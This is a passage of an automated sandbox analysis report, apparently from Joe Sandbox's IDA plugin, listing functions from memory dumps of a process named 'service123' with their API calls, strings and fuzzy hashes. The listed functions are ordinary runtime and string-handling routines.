Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: d3e7601b68b0f314a3557867b214c1566ea709f82a940aa8a33b8bf299e851d0
Instruction ID: 8c2d67e11719725550ae7c168f45c55cdc2818a445bfc9efaa4d014d299e446d
Opcode Fuzzy Hash: d3e7601b68b0f314a3557867b214c1566ea709f82a940aa8a33b8bf299e851d0
Instruction Fuzzy Hash: 16518D75B0A6118FDB10DF2CD68861AFBF1BF92708F52896DD4958B718D330E805DB92

Function 6C78E730 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C78E75A
wcslen.MSVCRT ref: 6C78E7CA

Strings

basic_string: construction from null is not valid, xrefs: 6C78E792, 6C78E802, 6C78E872

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 109084edfe36ac1685b3cb1dd2484c5c178eae7ada4d6ec0e890b885dce2ad2d
Instruction ID: 1c2c26ef9e4ed6188ce313e60d1dc5659b62c5b1bc7996b49b884dcd1d22e725
Opcode Fuzzy Hash: 109084edfe36ac1685b3cb1dd2484c5c178eae7ada4d6ec0e890b885dce2ad2d
Instruction Fuzzy Hash: 4941AFF5A066188FCB00BF2CD68584ABBE0BF55214F56497DE9848B314E331E989CBD2

Function 6C78E331 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C78E35D
strlen.MSVCRT ref: 6C78E3AD

Strings

basic_string: construction from null is not valid, xrefs: 6C78E37F, 6C78E3CF, 6C78E41F

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: f3f6deb31de8cc3ac784703581ece8105d9e4eb74089d2d15979bce115dd724e
Instruction ID: cf971d8f9e0708a06e45c2072fd1932b34e36a29abdef49239319603ab5dbb8f
Opcode Fuzzy Hash: f3f6deb31de8cc3ac784703581ece8105d9e4eb74089d2d15979bce115dd724e
Instruction Fuzzy Hash: 023166B16063188FCB10BF2CD58945AB7E4BF15618B06487DED888B711D731EC49CBE2

Function 001E7C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 001E7C92
MultiByteToWideChar.KERNEL32 ref: 001E7CD5

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 4703d803d62f5e727ec7a6907e9a1125ab5cd41cc7466c352b841354ad50a70a
Instruction ID: 1cd926cadac1afe39f543703fcd5cab2d4d2a1aee3c968d9e8a84ffb954ba5d6
Opcode Fuzzy Hash: 4703d803d62f5e727ec7a6907e9a1125ab5cd41cc7466c352b841354ad50a70a
Instruction Fuzzy Hash: 393106B050C7818FE710DF69D98426EBBF0BF85314F14891DE8948B390E3B6D889CB92

Function 6C779660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6C7796B2
MultiByteToWideChar.KERNEL32 ref: 6C7796F5

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 51de29040ced8d410b196291fe698b35e235bee7dcef67930aa94bcb2057d45a
Instruction ID: 169132612e30a1b808d2d378062a866b3dabb61340d7793d2433019994ed5f9b
Opcode Fuzzy Hash: 51de29040ced8d410b196291fe698b35e235bee7dcef67930aa94bcb2057d45a
Instruction Fuzzy Hash: 3D31F77450A3418FDB10DF39D58424ABBF0BF96318F14892DE89487751D37AD948CB92

Function 6C76F511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C76F5C1

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 01dd0aa72ccdfc6f5f504a1b1988cede6113a70a2485caf88f0bb731f864c0da
Instruction ID: bacb2d4bd93320d64be104e14d3ab068b78a4f32cdb3da2b91d6168f632b9f15
Opcode Fuzzy Hash: 01dd0aa72ccdfc6f5f504a1b1988cede6113a70a2485caf88f0bb731f864c0da
Instruction Fuzzy Hash: 1B41F571A0A301CFDB20DF2ED684706BBF0BB4631CF148A69E8584BA55D334E946CB92

Function 6C76F6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C76F751

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: fe275fd48562a4fcbe95c77f9361ed42b644e7c3f899108f94fae5be2749c758
Instruction ID: 1e3c3931a8dcad7f622318d36f7add07cf9f7fe246232cc1c06f8727975c9c88
Opcode Fuzzy Hash: fe275fd48562a4fcbe95c77f9361ed42b644e7c3f899108f94fae5be2749c758
Instruction Fuzzy Hash: 5E310574B0A301CFDB209F6AD684306BBF0AB4671CF158A7AEC588BA94D335D445CF92

Function 6C76F9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C76FA72
CreateSemaphoreW.KERNEL32 ref: 6C76FAB7
WaitForSingleObject.KERNEL32 ref: 6C76FB00

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 04e267139af034824ef0781881321774b685babcd761ce745e4607beff953fbf
Instruction ID: 9a7bdf8c8439cb53c8972641b8e5f609f3e92b4e8c7b1c3a2b096c814b7cdc1a
Opcode Fuzzy Hash: 04e267139af034824ef0781881321774b685babcd761ce745e4607beff953fbf
Instruction Fuzzy Hash: FF31C27060A201CFDB209F2EC694706BBF1BB47718F149A69E8588BA80D334D945DF92

Function 6C76FB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C76FBF2
CreateSemaphoreW.KERNEL32 ref: 6C76FC37
WaitForSingleObject.KERNEL32 ref: 6C76FC80

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: b13d6052071e6b2e88f5948c77b75fee54d5ece87cd583d6072cda66fda166ee
Instruction ID: 74b523c326297c6de9bf222c955ad7c16a47cd0b30e8b251a3882baac9453e60
Opcode Fuzzy Hash: b13d6052071e6b2e88f5948c77b75fee54d5ece87cd583d6072cda66fda166ee
Instruction Fuzzy Hash: 7031D37060A201CFDB20AF6AC6983067BF0AB4675CF149A69EC588BA84D739D445CFD2

Function 6C7655A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C7672FE

Strings

}, xrefs: 6C767392
{parm#, xrefs: 6C7672D9
this, xrefs: 6C7655B3

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 65ae5425e53f8f8d8aa730db99cfb910cab697a3cf728967f89f88fb9a982bb0
Instruction ID: 14cb29fbd9bfda5ddd9c5c2f8d60f1b55c684eff9968609f7886f2e5189321d0
Opcode Fuzzy Hash: 65ae5425e53f8f8d8aa730db99cfb910cab697a3cf728967f89f88fb9a982bb0
Instruction Fuzzy Hash: BD21837150D381CFD7118F26C1843A97BA1AF92348F18C9BDDCC88FE0AD77594899BA1

Function 001E1001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 001E106B
__p__fmode.MSVCRT ref: 001E1070
__p__commode.MSVCRT ref: 001E107D

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: e76cf95e2915b44b523e373ae85fe8f8dffc279727bd227f50d0e09a609dd15b
Instruction ID: 265ef37d7ffc403516b32fd47cdf4aa5ad0ea48cb4972f742ea3b64e74d572eb
Opcode Fuzzy Hash: e76cf95e2915b44b523e373ae85fe8f8dffc279727bd227f50d0e09a609dd15b
Instruction Fuzzy Hash: 53210670500AC1DFC324EF62D48136D33E1BB14344FA98968F4284FA55D77AD9C6DB91

Function 6C7D9D20 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C7D9D35
strlen.MSVCRT ref: 6C7D9D3F
memcpy.MSVCRT ref: 6C7D9D68
setlocale.MSVCRT ref: 6C7D9D7C

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 7274e38ec5cf22441e2326f066a5cbdf26b0f89cbeed37b45e0eca01191b1679
Instruction ID: 365deea0b16e524e93e59aee4ba6bcedea64f9004a9ff1cf020be28bb5dc95ae
Opcode Fuzzy Hash: 7274e38ec5cf22441e2326f066a5cbdf26b0f89cbeed37b45e0eca01191b1679
Instruction Fuzzy Hash: DCF0DAB150A3159ADB107F689A493AFFAF4FF90654F428D2DD4C88B711DB748848CB92

Function 001E4558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 001E4596
@, xrefs: 001E4647

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: ee5315ba11eeebc7175c84d9cef9421c2d7f9e8d8d352ac81c76974f6b9a018e
Instruction ID: 5c0015a5d4726b902879c43a085fddf45fdfcd0fa3a11e22a56b6bbc40808bd0
Opcode Fuzzy Hash: ee5315ba11eeebc7175c84d9cef9421c2d7f9e8d8d352ac81c76974f6b9a018e
Instruction Fuzzy Hash: 56A1AF31608BD18BD730CF26C0803AEBBE1BF85314F258A1EE8D987285D735D949DB82

Function 6C774C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 6C774C66
@, xrefs: 6C774D17

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: fabd6047a43046aad9781710bc5a10fbd9452cc222ef2d5b04759774726347d6
Instruction ID: a47cbaac20b701bb5fc2a9e13ced64555ea7f5d6e47c669b8e71a83ecc438ed9
Opcode Fuzzy Hash: fabd6047a43046aad9781710bc5a10fbd9452cc222ef2d5b04759774726347d6
Instruction Fuzzy Hash: 0FA1AD7160C3998BDB30CF25D68439ABBE1BB85308F148A2DE8D887751D734D949DFA2

Function 001E4C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 001E4DBE

Part of subcall function 001E2830: fputc.MSVCRT ref: 001E28F8

Strings

(null), xrefs: 001E4C27
@, xrefs: 001E4647

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: e5aab2dc0839bc8ed8dd332085499ec092d284f6910bc9a6782af36771ec23e1
Instruction ID: 1248e64815982e745618f7b9a35cf02a9f5a1c28a198021fe00e15a8a28d5d03
Opcode Fuzzy Hash: e5aab2dc0839bc8ed8dd332085499ec092d284f6910bc9a6782af36771ec23e1
Instruction Fuzzy Hash: 4C91BE31608BD18BD7318F26C0903AEBBE1BF85714F158A1EE8D987386D735D906DB82

Function 6C7752F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C77548E

Part of subcall function 6C772F00: fputc.MSVCRT ref: 6C772FC8

Strings

(null), xrefs: 6C7752F7
@, xrefs: 6C774D17

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: b0c60954971d15ac51d71533b5f98f88acea52892269ee6e0154161321a0592d
Instruction ID: 6d38847aad346563fe00bce17123deed899b1369b5452f6d47e6253ca8242e40
Opcode Fuzzy Hash: b0c60954971d15ac51d71533b5f98f88acea52892269ee6e0154161321a0592d
Instruction Fuzzy Hash: 3791BE7160C3998BDB308F24D68439ABBE1BF85308F148A2DE8DC87751D734D909DBA2

Function 6C7F5B60 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C7F5B9A
wcslen.MSVCRT ref: 6C7F5C2C
wcslen.MSVCRT ref: 6C7F5CBE
strlen.MSVCRT ref: 6C7F5D50

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 367addd476d326a640ed8a5eca7d8cfb3f62b9696ece7b7d24fdb24d49144636
Instruction ID: e66e86bd5a8a5f6e856f95e98318fc200234b44bf51312a835951d30fe7a526e
Opcode Fuzzy Hash: 367addd476d326a640ed8a5eca7d8cfb3f62b9696ece7b7d24fdb24d49144636
Instruction Fuzzy Hash: 71F17FB0A056058FCB50DF6CD2C899EBBF0FF44314B118A69E8A5CB754E735E946CB81

Function 6C7F5380 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C7F53BA
wcslen.MSVCRT ref: 6C7F544C
wcslen.MSVCRT ref: 6C7F54DE
strlen.MSVCRT ref: 6C7F5570

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 6b4ab95232ca6c5fcb2c2e1f73df39cfba901431129a1366f20824f2716ce5f1
Instruction ID: 60c9b678f3affc8213cb84471499c6a99c276df6298f20fdf40440a35d5b69ea
Opcode Fuzzy Hash: 6b4ab95232ca6c5fcb2c2e1f73df39cfba901431129a1366f20824f2716ce5f1
Instruction Fuzzy Hash: 29F15AB4A05605CFCB40DFADD2C89AEBBF1BF44314B118A69D8A5CB750D734E946CB81

Function 001E29B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 001E2A31

Strings

NaN, xrefs: 001E29B1

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: 9238488f0f779a15422b46c3de71528ca0ba54edf76950ff4d7ad8df444082b8
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: 32413E71A04A55CBDB24CF19C4D475AB7E9BF84704B29C2A9DC488F74AD372DC42CB90

Function 6C773080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C773101

Strings

NaN, xrefs: 6C773081

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

